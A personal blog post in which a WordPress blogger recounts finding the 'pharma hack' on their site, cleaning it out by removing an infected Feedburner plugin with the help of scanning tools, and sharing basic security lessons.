I noticed a recent comment from a visitor that read “You have been hacked with the pharma hack (google “pharma hack”). You can verify this by doing a google search for your domain name.” I thought it was simply a mistake or (ironically!) a spambot, so deleted it without a second thought. Even so, I did as the commenter suggested – out of idle curiosity more than anything – and discovered that s/he was absolutely correct. So, xensen, whoever you are, thanks. ^_^
As far as I know this blog’s never been a victim of a hacker before, and since it’s been a bit neglected in recent months I’ve done only the bare minimum in terms of upgrades, maintenance and general housekeeping. Since a lot of anime/J-culture bloggers I’m in contact with run on the wordpress platform, I might as well outline my experiences in case it happens to any of you as well.
The wordpress Pharma Hack doesn’t show itself on the blog itself, but its effects are obvious in the victim’s google rankings: post titles are replaced with spam ads and it can go unnoticed for some time…until the blogger either sees a drop in site traffic, visitors have trouble finding it through search engines or similar.
After the initial feelings of panic and “I…I…I’ve been violated…” I looked up the potential cause and what to do about it. I disabled all my plugins, backed up my database and WP directory (when was the last time I did THAT?), deleted all files and folders, re-installed a fresh copy of the WP software and restored the rest piece by piece. I re-uploaded images first, then plugins.
One useful tool in these situations is the Sucuri Sitecheck Scanner, which runs a diagnostic scan to show up what sort of nasties are lurking in your site. At the time of writing, this blog is clean but last weekend the scanner picked up a piece of Black Hat SEO malware that’s associated with unwanted/bogus ads. To pinpoint the problem I installed the WordPress Exploit Scanner, which runs a check through the WP install to highlight lines of code which may be troublesome and therefore require removal.
The Exploit Scanner picked out a couple of lines in my Feedburner plugin that are attributed to the WP Pharma Hack, so I deleted that offending plugin, ran the Sucuri scanner again and it gave me a clean bill of health. In a way I feel very fortunate in that the source of the problem was a mere plugin; I’ve read horror stories about blogs with infected databases which, with my limited knowledge of SQL, I’d be pretty at a loss in terms of how to deal with it.
In all honesty I don’t feel the need for the Feedburner plugin anyway – a lot of my site promotion comes from GRSI (now Google+) or Twitter; I don’t *think* removing Feedburner broke my RSS feed, but you might want to re-subscribe this blog in your feedreader, just in case. All this seems to have done in the long run is eat up a saturday while I was trying to familiarise myself with this little beastie of a hack and re-install my blog, but since I’ve used it as an excuse to start playing around with a new theme/layout it’s not all bad. I’ve also learned a few things:
- Regularly back up your database, themes, uploads and anything else important that’s unique to your blog’s install (duh!) That includes the config.php and the .htaccess file.
- Change your password periodically (duh!)
- Install only as many plugins as you need. Newer versions of WordPress have more stuff already included but some things, like anti-spam plugins, as essential. Each plugin is a potential target for a hacker. Keep those updated too, in case the developers come up with patches for security issues.
- Keep tabs on your google search results and site traffic. Sudden increases and decreases in hits are worth looking into, especially when you have a regular posting schedule (I don’t, but still…).
I now have the new (TwentyEleven) theme installed with some pretty-shiny new banner images, and a long to-do list for upcoming posts and tweaks to the layout. Last weekend actually reminded me about how fun maintaining (not just writing) a blog can be so I now have a few things lined up. The SF episodic story thing I was working on over on the main site will continue (when I’ve spring-cleaned and checked that WP installation too, natch) and at some point I’ll upload the rest of the photos from last September’s Japan trip onto Flickr. I want 2012 to be a productive year, whether the Mayans (or Roland Emmerich) were right about the imminent apocalypse or not.